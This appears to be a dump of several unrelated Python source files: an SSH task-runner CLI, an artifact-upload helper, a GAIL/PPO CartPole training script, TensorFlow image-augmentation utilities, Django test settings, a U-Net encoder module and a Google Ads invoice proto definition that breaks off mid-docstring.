yield task_name, task_func, args, kwargs
def getTasks(tasks, plaitfile, **kwargs):
if not tasks:
raise StartupError("Must specify at least one task to execute.")
pf_module = importPlaitfile(plaitfile or findPlaitfile())
return list(gatherTasks(tasks, pf_module))
def setupLogging(logging, **kwargs):
if logging:
logger.startLogging(sys.stdout, setStdout=1)
def readKey(path):
try:
return Key.fromFile(path)
except EncryptedKeyError:
passphrase = getpass.getpass("%r keyphrase: " % (path,))
return Key.fromFile(path, passphrase=passphrase)
def getKeys(identity, **kwargs):
key_path = os.path.expanduser(identity)
if os.path.exists(key_path):
return [readKey(key_path)]
def getKnownHosts(knownhosts, **kwargs):
known_hosts_path = FilePath(os.path.expanduser(knownhosts))
if known_hosts_path.exists():
return KnownHostsFile.fromPath(known_hosts_path)
def getAgentEndpoint(agent, **kwargs):
if "SSH_AUTH_SOCK" in os.environ and agent:
auth_socket = os.environ["SSH_AUTH_SOCK"]
return UNIXClientEndpoint(reactor, auth_socket)
def getHosts(host, hostfile, **kwargs):
hosts = list(host)
if hostfile:
with open(hostfile, 'r') as fobj:
hosts += tuple(l.strip() for l in fobj.readlines())
if not sys.stdin.isatty():
hosts += tuple(l.strip() for l in sys.stdin.readlines())
if not len(hosts):
raise StartupError("Must specify at least one host.")
return hosts
def getErrorFilter(errors, hide_errors, **kwargs):
if errors and hide_errors:
msg = "`-e` and `-E` cannot be used simultaneously."
raise StartupError(msg)
elif errors:
# only show errors
return True
elif hide_errors:
# don't show errors
return False
else:
# show all sessions
return None
def getGrepFilter(grep, hide_grep, **kwargs):
if grep and hide_grep:
msg = "`-g` and `-G` cannot be used simultaneously."
raise StartupError(msg)
elif grep:
return lambda x: (re.search(grep, x) is not None)
elif hide_grep:
return lambda x: (re.search(hide_grep, x) is None)
else:
return lambda x: (re.search(".*", x) is not None)
def getQuietFilter(quiet, **kwargs):
return quiet
def getQuietReport(quiet_report, **kwargs):
return quiet_report
def getShowReport(report, **kwargs):
return report
def getAllTasks(all_tasks, **kwargs):
return all_tasks
def getConnectSettings(scale, retries, timeout, **kwargs):
return Bag(scale=scale,
retries=retries,
timeout=timeout,
keys = getKeys(**kwargs),
known_hosts = getKnownHosts(**kwargs),
agent_endpoint = getAgentEndpoint(**kwargs))
@click.command()
@click.argument('tasks', nargs=-1)
@click.option('--host', '-h',
multiple=True, metavar='*',
help="[$USER@]hostname[:22]")
@click.option('--hostfile', '-H',
default=False, metavar='',
help="Read hosts from a line delimited file")
@click.option('--plaitfile', '-p',
default=None, metavar='',
help="Read tasks from specified file")
@click.option('--interactive', '-I',
is_flag=True,
help="Display results graphically")
@click.option('--all-tasks', '-A',
is_flag=True, metavar='',
help="Tasks with no output result in a warning")
@click.option('--report', '-R',
is_flag=True, metavar='',
help="Print summary report")
@click.option('--quiet', '-q',
is_flag=True, metavar='',
help="Hide hosts that produce no result")
@click.option('--quiet-report', '-Q',
is_flag=True, metavar='',
help="Only print summary report (implies -R)")
@click.option('--errors', '-e',
is_flag=True, metavar='',
help="Only show sessions with an error")
@click.option('--hide-errors', '-E',
is_flag=True, metavar='',
help="Hide sessions with an error")
@click.option('--grep', '-g',
default=None, metavar='',
help="Only display sessions matching a pattern")
@click.option('--hide-grep', '-G',
default=None, metavar='',
help="Hide sessions matching a pattern")
@click.option('--scale', '-s',
default=0, metavar='',
help="Number of hosts to execute in parallel")
@click.option('--retries', '-r',
default=1, metavar='',
help="Times to retry SSH connection")
@click.option('--timeout', '-t',
default=10, metavar='',
help="Seconds to wait for SSH")
@click.option('--identity', '-i',
default="~/.ssh/id_rsa", metavar="*",
help="Public key to use")
@click.option('--agent', '-a',
is_flag=True,
help="Whether to use system ssh-agent for auth")
@click.option('--knownhosts', '-k',
default="~/.ssh/known_hosts", metavar='',
help="File with authorized hosts")
@click.option('--logging', '-l',
is_flag=True,
help="Show twisted logging")
def run(tasks, interactive, **kwargs):
"""
* can be supplied multiple times
"""
setupLogging(**kwargs)
tasks = getTasks(tasks, **kwargs)
hosts = getHosts(**kwargs)
connect_settings = getConnectSettings(**kwargs)
all_tasks = getAllTasks(**kwargs)
runner = PlaitRunner(hosts, tasks, connect_settings, all_tasks)
error_filter = getErrorFilter(**kwargs)
grep_filter = getGrepFilter(**kwargs)
quiet_filter = getQuietFilter(**kwargs)
show_report = getShowReport(**kwargs)
quiet_report = getQuietReport(**kwargs)
if interactive:
app = ConsoleApp(title="plait 1.0")
else:
app = TerminalApp(error_filter, grep_filter, quiet_filter,
report=show_report, report_only=quiet_report)
app.run(runner)
def main():
try:
run()
except StartupError as e:
log.error(" * " + e.message)
if hasattr(e, 'tb'):
log.error(e.tb)
|
py | b403611abb61bfb53fa049c5a12055745b767b5a | from datetime import datetime
from typing import Any
import magic # type: ignore
import requests
from requests import Response
mime: Any = magic.Magic(mime=True)
file_access_url = "https://api.treebeard.io"
def log(message: str):
print(f'{datetime.now().strftime("%H:%M:%S")}: {message}')
def upload_artifact(filename: str, upload_path: str):
log(f"Saving {filename} to {upload_path}")
content_type: str = mime.from_file(filename)
with open(filename, "rb") as data:
resp: Response = requests.get(
f"{file_access_url}/get_upload_url/{upload_path}",
params={"content_type": content_type},
)
signed_url: str = resp.text
requests.put(signed_url, data, headers={"Content-Type": content_type})
|
py | b403616bb015bdd5a7eb6bfcde632323168103f7 | #!/usr/bin/python3
import argparse
import gym
import numpy as np
import tensorflow as tf
from network_models.policy_net import Model_Policy_net, Policy_net, Model_net
from network_models.discriminator import Discriminator, ModelDiscriminator
from algo.ppo import PPOTrain, ModelTrain
import pdb
import math
from time import sleep
def argparser():
parser = argparse.ArgumentParser()
parser.add_argument('--logdir', help='log directory', default='log/train/gail_model3')
parser.add_argument('--savedir', help='save directory', default='trained_models/gail_model')
parser.add_argument('--gamma', default=0)
parser.add_argument('--iteration', default=int(1e6), type=int)
parser.add_argument('--resdir', help='expert actor policy', default='trained_models/ppo/expert/model.ckpt')
return parser.parse_args()
def check_done(state, policy_steps):
x, x_dot, theta, theta_dot = state
theta_threshold_radians = 12 * 2 * math.pi / 360
x_threshold = 2.4
done = x < -x_threshold \
or x > x_threshold \
or theta < -theta_threshold_radians \
or theta > theta_threshold_radians
if policy_steps > 200:
done = True
return done
def check_done_easy(policy_steps):
return policy_steps > 200
if __name__ == '__main__':
args = argparser()
env = gym.make('CartPole-v0')
env.seed(0)
ob_space = env.observation_space
obs_dim = 4
act_dim = 1
num_epochs = 1
batches_per_epoch = 10
batch = 64
rl = True
sl = False
render = True
render_freq = 500
d_freq = 1
use_dummy_data = False
use_random = False
# For expert data it seems that gamma = 0, (rl: (32, 5)), stop=50 works well
stochastic_policy = True
stochastic_model = True
disc_test = False
# Policy is now the dynamics model
Model = Model_Policy_net('model_policy', env, obs_dim+act_dim, obs_dim)
Old_Model = Model_Policy_net('old_model_policy', env, obs_dim+act_dim, obs_dim)
PPO = ModelTrain(Model, Old_Model, obs_dim+act_dim, obs_dim, gamma=args.gamma)
D = ModelDiscriminator(env, obs_dim+act_dim, obs_dim)
# Load the actor
Policy = Policy_net('policy', env)
restore_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='policy')
restorer = tf.train.Saver(var_list=restore_vars)
saver = tf.train.Saver()
# Process expert data for discriminator
if use_dummy_data:
# Dummy expert data (REMOVE WHEN DONE DEBUGGING)
print("Using dummy data")
load_exp_o = np.tile(np.array([[0., 0., 1., 0.]]), [10000, 1])
load_exp_a = np.ones((10000, act_dim))
exp_o = np.concatenate([load_exp_o, load_exp_a], axis=1)
exp_a = load_exp_o
reset_idx = np.zeros((len(exp_o)))
elif use_random:
print("Using random policy data")
load_exp_o = np.genfromtxt('rtrajectory/observations.csv')
load_exp_a = np.expand_dims(np.genfromtxt('rtrajectory/actions.csv', dtype=np.int32), axis=1)
reset_idx = np.genfromtxt('rtrajectory/reset_idx.csv', dtype=np.float32)
exp_o = np.concatenate([load_exp_o[:-1]] + [load_exp_a[:-1]]*act_dim, axis=1)
exp_a = load_exp_o[1:]
# Take out transitions at the end of episodes
mask = reset_idx[1:]
delete_idx = np.nonzero(np.logical_not(mask))[0]
exp_o = np.delete(exp_o, delete_idx, 0)
exp_a = np.delete(exp_a, delete_idx, 0)
else:
print("Using expert data")
load_exp_o = np.genfromtxt('trajectory/observations.csv')
load_exp_a = np.expand_dims(np.genfromtxt('trajectory/actions.csv', dtype=np.int32), axis=1)
reset_idx = np.genfromtxt('trajectory/reset_idx.csv', dtype=np.float32)
exp_o = np.concatenate([load_exp_o[:-1]] + [load_exp_a[:-1]]*act_dim, axis=1)
exp_a = load_exp_o[1:]
# Take out transitions at the end of episodes
mask = reset_idx[1:]
delete_idx = np.nonzero(np.logical_not(mask))[0]
exp_o = np.delete(exp_o, delete_idx, 0)
exp_a = np.delete(exp_a, delete_idx, 0)
# Process expert data for supervised learning
given = np.concatenate([load_exp_o[:-1], load_exp_a[:-1]], axis=1)
tv = load_exp_o[1:]
mask = reset_idx[1:]
tv = np.concatenate([tv, mask[:, np.newaxis]], axis=1)
num_demo = len(load_exp_o) - 1
print("Number of Demonstrations: {}".format(num_demo))
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
restorer.restore(sess, args.resdir)
writer = tf.summary.FileWriter(args.logdir, sess.graph)
success_num = 0
for iteration in range(args.iteration):
# Supervised Learning
if sl:
epoch_loss = []
for i in range(batches_per_epoch):
batch_idx = np.random.randint(num_demo, size=batch)
batch_given = given[batch_idx]
batch_tv = tv[batch_idx]
_, loss = Model.train_sl(batch_given, batch_tv)
epoch_loss.append(loss)
#print("Epoch: {}, Loss: {}".format(iteration, np.mean(epoch_loss)))
#sl = False
if render and iteration % render_freq == 0:
obs = np.expand_dims(env.reset(), axis=0)
for i in range(100):
# Render
env.render()
sleep(0.01)
# Process the actions
if use_dummy_data:
action = np.array([1.])
elif use_random:
#action = np.array([np.random.randint(2)])
action = np.array([0.])
else:
action, _ = Policy.act(obs=obs, stochastic=stochastic_policy)
action = np.array(action)
# State input to model
given_model = np.expand_dims(np.concatenate([np.squeeze(obs)]+[action]*act_dim, axis=0), axis=0)
obs, _ = Model.step(given_model, stochastic=True)
env.env.state = np.squeeze(obs)
print(given_model)
if rl:
# Reinforcement Learning
observations = []
actions = []
rewards = []
v_preds = []
run_policy_steps = 0
obs = np.expand_dims(env.reset(), axis=0)
while True:
#env.render()
run_policy_steps += 1
if use_dummy_data:
act = np.array([[1.]])
elif use_random:
#act = np.array([[np.random.randint(2)]])
act = np.array([[0.]])
else:
act, _ = Policy.act(obs=obs, stochastic=stochastic_policy)
act = np.expand_dims(act, axis=0)
# Model state
state = np.concatenate([obs] + [act]*act_dim, axis=1)
assert state.shape[1] == obs_dim + act_dim
# Take a step with the model
if disc_test:
next_obs, reward, done, info = env.step(np.asscalar(act))
next_obs = np.expand_dims(next_obs, axis=0)
v_pred = 0
else:
next_obs, v_pred = Model.step(state, stochastic=stochastic_model)
v_pred = np.asscalar(v_pred)
#done = check_done(np.squeeze(next_obs), run_policy_steps)
done = check_done_easy(run_policy_steps)
reward = 1. if not done else 0.
observations.append(state)
actions.append(next_obs)
rewards.append(reward)
v_preds.append(v_pred)
if done:
_, v_pred = Policy.act(obs=next_obs, stochastic=stochastic_policy)
v_preds_next = v_preds[1:] + [np.asscalar(v_pred)]
break
else:
obs = next_obs
# Summary
el_sum = tf.Summary(value=[tf.Summary.Value(tag='episode_length', simple_value=run_policy_steps)])
er_sum = tf.Summary(value=[tf.Summary.Value(tag='episode_reward', simple_value=sum(rewards))])
writer.add_summary(el_sum, iteration)
writer.add_summary(er_sum, iteration)
'''
# Finished check
if sum(rewards) >= 195:
success_num += 1
if success_num >= 100:
saver.save(sess, args.savedir + '/model.ckpt')
print('Clear!! Model saved.')
break
else:
success_num = 0
'''
# convert list to numpy array for feeding tf.placeholder
observations = np.reshape(observations, newshape=[-1] + [obs_dim + act_dim])
actions = np.reshape(actions, newshape=[-1] + [obs_dim])
'''
for j in range(len(observations)):
env.env.state = observations[j, :4]
env.render()
'''
# output of this discriminator is reward
d_rewards = D.get_rewards(agent_s=observations, agent_a=actions)
e_rewards = D.get_rewards(agent_s=exp_o, agent_a=exp_a)
d_rewards = np.reshape(d_rewards, newshape=[-1]).astype(dtype=np.float32)
'''
# train discriminator
if iteration % d_freq == 0 and np.mean(e_rewards) / np.mean(d_rewards) < 1.5:
for epoch in range(1):
for k in range(1):
batch_idx_exp = np.random.randint(num_demo, size=batch)
batch_idx = np.random.randint(len(observations), size=batch)
#batch_idx = np.random.randint(num_demo, size=batch)
batch_exp_o = exp_o[batch_idx_exp]
batch_exp_a = exp_a[batch_idx_exp]
batch_obs = observations[batch_idx]
batch_a = actions[batch_idx]
#batch_obs = exp_o[batch_idx]
#batch_a = exp_a[batch_idx]
D.train(expert_s=batch_exp_o,
expert_a=batch_exp_a,
agent_s=batch_obs,
agent_a=batch_a)
'''
if np.mean(e_rewards) / np.mean(d_rewards) < 2.:
for k in range(1):
D.train(expert_s=exp_o,
expert_a=exp_a,
agent_s=observations,
agent_a=actions)
# output of this discriminator is reward
d_rewards = D.get_rewards(agent_s=observations, agent_a=actions)
e_rewards = D.get_rewards(agent_s=exp_o, agent_a=exp_a)
d_rewards = np.reshape(d_rewards, newshape=[-1]).astype(dtype=np.float32)
print("Iteration: {}, Rewards: {}, DRewards: {}, ERewards: {}".format(iteration, sum(rewards), np.mean(d_rewards), np.mean(e_rewards)), end='\r')
if not disc_test:
# Advantage estimation
gaes = PPO.get_gaes(rewards=d_rewards, v_preds=v_preds, v_preds_next=v_preds_next)
gaes = np.array(gaes).astype(dtype=np.float32)
v_preds_next = np.array(v_preds_next).astype(dtype=np.float32)
# Train policy
inp = [observations, actions, gaes, d_rewards, v_preds_next]
PPO.assign_policy_parameters()
for epoch in range(5): # 3, 100 (works well): 5, 200 works well
sample_indices = np.random.randint(low=0, high=observations.shape[0], size=32) # indices are in [low, high)
sampled_inp = [np.take(a=a, indices=sample_indices, axis=0) for a in inp] # sample training dat
a
PPO.train(obs=sampled_inp[0],
actions=sampled_inp[1],
gaes=sampled_inp[2],
rewards=sampled_inp[3],
v_preds_next=sampled_inp[4])
summary = PPO.get_summary(obs=inp[0],
actions=inp[1],
gaes=inp[2],
rewards=inp[3],
v_preds_next=inp[4])
sl_loss = Model.get_sl_loss(given, tv)
writer.add_summary(summary, iteration)
writer.add_summary(tf.Summary(value=[tf.Summary.Value(tag='d_rewards', simple_value=np.mean(d_rewards))]), iteration)
writer.add_summary(tf.Summary(value=[tf.Summary.Value(tag='sl_loss', simple_value=sl_loss)]), iteration)
writer.close()
|
py | b4036371fe6df8141e4324d2f23b3f76eea127a6 | import tensorflow as tf
from tensorflow.contrib import slim
import cv2
import os, random
import numpy as np
import scipy.stats as st
from scipy.ndimage import filters
from skimage import segmentation, color
from joblib import Parallel, delayed
from PIL import Image
import sys, math
class ImageData:
def __init__(self, load_size, channels, augment_flag):
self.load_size = load_size
self.channels = channels
self.augment_flag = augment_flag
def image_processing(self, filename):
x = tf.read_file(filename)
x_decode = tf.image.decode_jpeg(x, channels=self.channels)
img = tf.image.resize_images(x_decode, [self.load_size, self.load_size])
img = tf.cast(img, tf.float32) / 127.5 - 1
if self.augment_flag :
augment_size = self.load_size + (30 if self.load_size == 256 else 15)
p = random.random()
if p > 0.5:
img = data_augmentation(img, augment_size)
return img
def data_augmentation(image, augment_size):
seed = random.randint(0, 2 ** 31 - 1)
ori_image_shape = tf.shape(image)
image = tf.image.random_flip_left_right(image, seed=seed)
image = tf.image.resize_images(image, [augment_size, augment_size])
image = tf.random_crop(image, ori_image_shape, seed=seed)
return image
def load_test_data(image_path, size=256):
img = cv2.imread(image_path, flags=cv2.IMREAD_COLOR)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = cv2.resize(img, dsize=(size, size))
img = np.expand_dims(img, axis=0)
img = img/127.5 - 1
return img
def save_images(images, size, image_path):
return imsave(inverse_transform(images), size, image_path)
def inverse_transform(images):
return ((images+1.) / 2) * 255.0
def imsave(images, size, path):
images = merge(images, size)
images = cv2.cvtColor(images.astype('uint8'), cv2.COLOR_RGB2BGR)
return cv2.imwrite(path, images)
def merge(images, size):
h, w = images.shape[1], images.shape[2]
img = np.zeros((h * size[0], w * size[1], 3))
for idx, image in enumerate(images):
i = idx % size[1]
j = idx // size[1]
img[h*j:h*(j+1), w*i:w*(i+1), :] = image
return img
def show_all_variables():
model_vars = tf.trainable_variables()
slim.model_analyzer.analyze_vars(model_vars, print_info=True)
def check_folder(log_dir):
if not os.path.exists(log_dir):
os.makedirs(log_dir)
return log_dir
def str2bool(x):
return x.lower() in ('true')
##########################################
# Image Augmentation.
##########################################
def image_augmentation(image):
_realA = random_brightness(image)
_realA = random_contrast(_realA)
_realA = random_color_transform(_realA)
_realA = additive_shade(_realA)
_realA = guided_filter(_realA, image, 5, eps=2e-1)
_realA = random_distortion(_realA)
return _realA
def additive_gaussian_noise(image, stddev_range=[5, 95]):
stddev = tf.random_uniform((), *stddev_range)
p = random.random()
noise = p * tf.random_normal(tf.shape(image), stddev=stddev)
return image + noise
def random_brightness(image, max_abs_change=50):
return tf.image.random_brightness(image, max_abs_change)
def random_contrast(image, strength_range=[0.5, 1.5]):
return tf.image.random_contrast(image, *strength_range)
def random_color_transform(image, color_matrix=None):
# color_matrix is 3x3
if color_matrix is None:
color_matrix = tf.random_uniform((3,3), 0, 1.0, dtype=tf.float32)
color_matrix_norm = tf.reduce_sum(color_matrix, axis=0, keepdims=True)
color_matrix = color_matrix / (color_matrix_norm + 1e-6)
elif isinstance(color_matrix, np.ndarray):
color_matrix = tf.convert_to_tensor(color_matrix, dtype=tf.float32)
im_shp = tf.shape(image)
C = im_shp[-1]
image = tf.reshape(image, [-1, C])
image = tf.matmul(image, color_matrix)
image = tf.reshape(image, im_shp)
return image
def additive_shade(image, nb_ellipses=20, transparency_range=[-0.5, 0.8],
kernel_size_range=[250, 350]):
def _py_additive_shade(img):
min_dim = min(img.shape[:2]) / 4
mask = np.zeros(img.shape[:2], np.uint8)
for i in range(nb_ellipses):
ax = int(max(np.random.rand() * min_dim, min_dim / 5))
ay = int(max(np.random.rand() * min_dim, min_dim / 5))
max_rad = max(ax, ay)
x = np.random.randint(max_rad, img.shape[1] - max_rad) # center
y = np.random.randint(max_rad, img.shape[0] - max_rad)
angle = np.random.rand() * 90
cv2.ellipse(mask, (x, y), (ax, ay), angle, 0, 360, 255, -1)
transparency = np.random.uniform(*transparency_range)
kernel_size = np.random.randint(*kernel_size_range)
if (kernel_size % 2) == 0: # kernel_size has to be odd
kernel_size += 1
mask = cv2.GaussianBlur(mask.astype(np.float32), (kernel_size, kernel_size), 0)
shaded = img * (1 - transparency * mask[..., np.newaxis]/255.)
return shaded
shaded = tf.py_func(_py_additive_shade, [image], tf.float32)
res = tf.reshape(shaded, tf.shape(image))
return res
def tf_box_filter(x, r):
ch = x.get_shape().as_list()[-1]
weight = 1/((2*r+1)**2)
box_kernel = weight*np.ones((2*r+1, 2*r+1, ch, 1))
box_kernel = np.array(box_kernel).astype(np.float32)
output = tf.nn.depthwise_conv2d(x, box_kernel, [1, 1, 1, 1], 'SAME')
return output
def guided_filter(x, y, r, eps=1e-2):
x_shape = tf.shape(x)
N = tf_box_filter(tf.ones((1, x_shape[1], x_shape[2], 1), dtype=x.dtype), r)
mean_x = tf_box_filter(x, r) / N
mean_y = tf_box_filter(y, r) / N
cov_xy = tf_box_filter(x * y, r) / N - mean_x * mean_y
var_x = tf_box_filter(x * x, r) / N - mean_x * mean_x
A = cov_xy / (var_x + eps)
b = mean_y - A * mean_x
mean_A = tf_box_filter(A, r) / N
mean_b = tf_box_filter(b, r) / N
output = mean_A * x + mean_b
return output
def random_distortion(images, num_anchors=10, perturb_sigma=5.0, disable_border=True):
# Similar results to elastic deformation (a bit complex transformation)
# However, the transformation is much faster that elastic deformation and have a straightforward arguments
# TODO: Need to adapt reflect padding and eliminate out-of-frame
# images is 4D tensor [B,H,W,C]
# num_anchors : the number of base position to make distortion, total anchors in a image = num_anchors**2
# perturb_sigma : the displacement sigma of each anchor
src_shp_list = images.get_shape().as_list()
batch_size, src_height, src_width = tf.unstack(tf.shape(images))[:3]
if disable_border:
pad_size = tf.to_int32(tf.to_float(tf.maximum(src_height, src_width)) * (np.sqrt(2)-1.0) / 2 + 0.5)
images = tf.pad(images, [[0,0], [pad_size]*2, [pad_size]*2, [0,0]], 'REFLECT')
height, width = tf.unstack(tf.shape(images))[1:3]
mapx_base = tf.matmul(tf.ones(shape=tf.stack([num_anchors, 1])),
tf.transpose(tf.expand_dims(tf.linspace(0., tf.to_float(width), num_anchors), 1), [1, 0]))
mapy_base = tf.matmul(tf.expand_dims(tf.linspace(0., tf.to_float(height), num_anchors), 1),
tf.ones(shape=tf.stack([1, num_anchors])))
mapx_base = tf.tile(mapx_base[None,...,None], [batch_size,1,1,1]) # [batch_size, N, N, 1]
mapy_base = tf.tile(mapy_base[None,...,None], [batch_size,1,1,1])
distortion_x = tf.random_normal((batch_size,num_anchors,num_anchors,1), stddev=perturb_sigma)
distortion_y = tf.random_normal((batch_size,num_anchors,num_anchors,1), stddev=perturb_sigma)
mapx = mapx_base + distortion_x
mapy = mapy_base + distortion_y
mapx_inv = mapx_base - distortion_x
mapy_inv = mapy_base - distortion_y
interp_mapx_base = tf.image.resize_images(mapx_base, size=(height, width), method=tf.image.ResizeMethod.BILINEAR, align_corners=True)
interp_mapy_base = tf.image.resize_images(mapy_base, size=(height, width), method=tf.image.ResizeMethod.BILINEAR, align_corners=True)
coord_maps_base = tf.concat([interp_mapx_base, interp_mapy_base], axis=-1)
interp_mapx = tf.image.resize_images(mapx, size=(height, width), method=tf.image.ResizeMethod.BILINEAR, align_corners=True)
interp_mapy = tf.image.resize_images(mapy, size=(height, width), method=tf.image.ResizeMethod.BILINEAR, align_corners=True)
coord_maps = tf.concat([interp_mapx, interp_mapy], axis=-1) # [batch_size, height, width, 2]
# interp_mapx_inv = tf.image.resize_images(mapx_inv, size=(height, width), method=tf.image.ResizeMethod.BILINEAR, align_corners=True)
# interp_mapy_inv = tf.image.resize_images(mapy_inv, size=(height, width), method=tf.image.ResizeMethod.BILINEAR, align_corners=True)
# coord_maps_inv = tf.concat([interp_mapx_inv, interp_mapy_inv], axis=-1) # [batch_size, height, width, 2]
coord_maps_inv = coord_maps_base + (coord_maps_base-coord_maps)
warp_images = bilinear_sampling(images, coord_maps)
if disable_border:
warp_images = tf.slice(warp_images, [0, pad_size, pad_size, 0], [-1, src_height, src_width, -1])
warp_images.set_shape(src_shp_list)
# shp_list[-1] = 2
# coord_maps.set_shape(shp_list)
# coord_maps_inv.set_shape(shp_list)
return warp_images
# return warp_images, coord_maps, coord_maps_inv
#
# Image processing
# Some codes come from https://github.com/rpautrat/SuperPoint
# input image is supposed to be 3D tensor [H,W,C] and floating 0~255 values
#
def get_rank(inputs):
return len(inputs.get_shape())
def bilinear_sampling(photos, coords):
"""Construct a new image by bilinear sampling from the input image.
Points falling outside the source image boundary have value 0.
Args:
photos: source image to be sampled from [batch, height_s, width_s, channels]
coords: coordinates of source pixels to sample from [batch, height_t,
width_t, 2]. height_t/width_t correspond to the dimensions of the output
image (don't need to be the same as height_s/width_s). The two channels
correspond to x and y coordinates respectively.
Returns:
A new sampled image [batch, height_t, width_t, channels]
"""
# photos: [batch_size, height2, width2, C]
# coords: [batch_size, height1, width1, C]
def _repeat(x, n_repeats):
rep = tf.transpose(
tf.expand_dims(tf.ones(shape=tf.stack([
n_repeats,
])), 1), [1, 0])
rep = tf.cast(rep, 'float32')
x = tf.matmul(tf.reshape(x, (-1, 1)), rep)
return tf.reshape(x, [-1])
with tf.name_scope('image_sampling'):
coords_x, coords_y = tf.split(coords, [1, 1], axis=3)
inp_size = tf.shape(photos)
coord_size = tf.shape(coords)
out_size = tf.stack([coord_size[0],
coord_size[1],
coord_size[2],
inp_size[3],
])
coords_x = tf.cast(coords_x, 'float32')
coords_y = tf.cast(coords_y, 'float32')
x0 = tf.floor(coords_x)
x1 = x0 + 1
y0 = tf.floor(coords_y)
y1 = y0 + 1
y_max = tf.cast(tf.shape(photos)[1] - 1, 'float32')
x_max = tf.cast(tf.shape(photos)[2] - 1, 'float32')
zero = tf.zeros([1], dtype='float32')
x0_safe = tf.clip_by_value(x0, zero, x_max)
y0_safe = tf.clip_by_value(y0, zero, y_max)
x1_safe = tf.clip_by_value(x1, zero, x_max)
y1_safe = tf.clip_by_value(y1, zero, y_max)
## bilinear interp weights, with points outside the grid having weight 0
# wt_x0 = (x1 - coords_x) * tf.cast(tf.equal(x0, x0_safe), 'float32')
# wt_x1 = (coords_x - x0) * tf.cast(tf.equal(x1, x1_safe), 'float32')
# wt_y0 = (y1 - coords_y) * tf.cast(tf.equal(y0, y0_safe), 'float32')
# wt_y1 = (coords_y - y0) * tf.cast(tf.equal(y1, y1_safe), 'float32')
wt_x0 = x1_safe - coords_x
wt_x1 = coords_x - x0_safe
wt_y0 = y1_safe - coords_y
wt_y1 = coords_y - y0_safe
## indices in the flat image to sample from
dim2 = tf.cast(inp_size[2], 'float32')
dim1 = tf.cast(inp_size[2] * inp_size[1], 'float32')
base = tf.reshape(
_repeat(
tf.cast(tf.range(coord_size[0]), 'float32') * dim1,
coord_size[1] * coord_size[2]),
[out_size[0], out_size[1], out_size[2], 1])
base_y0 = base + y0_safe * dim2
base_y1 = base + y1_safe * dim2
idx00 = tf.reshape(x0_safe + base_y0, [-1])
idx01 = x0_safe + base_y1
idx10 = x1_safe + base_y0
idx11 = x1_safe + base_y1
## sample from photos
photos_flat = tf.reshape(photos, tf.stack([-1, inp_size[3]]))
photos_flat = tf.cast(photos_flat, 'float32')
im00 = tf.reshape(tf.gather(photos_flat, tf.cast(idx00, 'int32')), out_size)
im01 = tf.reshape(tf.gather(photos_flat, tf.cast(idx01, 'int32')), out_size)
im10 = tf.reshape(tf.gather(photos_flat, tf.cast(idx10, 'int32')), out_size)
im11 = tf.reshape(tf.gather(photos_flat, tf.cast(idx11, 'int32')), out_size)
w00 = wt_x0 * wt_y0
w01 = wt_x0 * wt_y1
w10 = wt_x1 * wt_y0
w11 = wt_x1 * wt_y1
out_photos = tf.add_n([
w00 * im00, w01 * im01,
w10 * im10, w11 * im11])
return out_photos |
py | b40363dd283abae2c8ddc199b113ab4a3090ac4e | from tests.settings_base import * # noqa
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'pytest_django' + db_suffix,
'HOST': 'localhost',
'USER': 'root',
'OPTIONS': {
'init_command': 'SET storage_engine=MyISAM'
}
},
}
|
py | b40363ff9120fcaa0c0bfcb4976bb5fc0df66341 | #########################################################################################################################
## Distribution code Version 1.0 -- 14/10/2021 by Tak Ming Wong Copyright 2021, University of Siegen
##
## The Code is created based on the method described in the following paper
## [1] "Deep Optimization Prior for THz Model Parameter Estimation", T.M. Wong, H. Bauermeister, M. Kahl, P. Haring Bolivar, M. Moeller, A. Kolb,
## Winter Conference on Applications of Computer Vision (WACV) 2022.
##
## If you use this code in your scientific publication, please cite the mentioned paper.
## The code and the algorithm are for non-comercial use only.
##
## For other details, please visit website https://github.com/tak-wong/Deep-Optimization-Prior
#########################################################################################################################
import torch
import torch.nn as nn
from .unet.skip import skip
from ..hyperparameter import *
def get_network_encoder_unet(device, model, hp):
network = skip(num_input_channels = model.NQ,
num_output_channels = model.NP,
num_channels_down = hp.NET_UNET_CHANNELS_DOWN,
num_channels_up = hp.NET_UNET_CHANNELS_UP,
num_channels_skip = hp.NET_UNET_CHANNELS_SKIP,
upsample_mode = hp.NET_UNET_MODE,
need_sigmoid = hp.NET_UNET_NEED_SIGMOID,
need_bias = hp.NET_UNET_NEED_BIAS,
pad = hp.NET_UNET_PAD,
act_fun = hp.NET_UNET_ACT_FUNC).type(torch.cuda.FloatTensor)
return network
# network of encoder
class network(nn.Module):
# -----------------------------------------------------------------------
def __init__(self, device, hp, verbose = False):
super(network, self).__init__()
self.verbose = verbose
self.device = device
self.hp = hp
if self.verbose:
print("network_encoder is initialized")
# -----------------------------------------------------------------------
def initialize_weights(self):
pass
# -----------------------------------------------------------------------
def forward(self, x):
pass
|
py | b40365b90a951594d23eb299cff5922dc680238c | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v7.common.types import dates
from google.ads.googleads.v7.enums.types import invoice_type
__protobuf__ = proto.module(
package="google.ads.googleads.v7.resources",
marshal="google.ads.googleads.v7",
manifest={"Invoice",},
)
class Invoice(proto.Message):
r"""An invoice. All invoice information is snapshotted to match
the PDF invoice. For invoices older than the launch of
InvoiceService, the snapshotted information may not match the
PDF invoice.
Attributes:
resource_name (str):
Output only. The resource name of the invoice. Multiple
customers can share a given invoice, so multiple resource
names may point to the same invoice. Invoice resource names
have the form:
``customers/{customer_id}/invoices/{invoice_id}``
id (str):
Output only. The ID of the invoice. It
appears on the invoice PDF as "Invoice number".
type_ (google.ads.googleads.v7.enums.types.InvoiceTypeEnum.InvoiceType):
Output only. The type of invoice.
billing_setup (str):
Output only. The resource name of this invoice’s billing
setup.
``customers/{customer_id}/billingSetups/{billing_setup_id}``
payments_account_id (str):
Output only. A 16 digit ID used to identify
the payments account associated with the billing
setup, e.g. "1234-5678-9012-3456". It appears on
the invoice PDF as "Billing Account Number".
payments_profile_id (str):
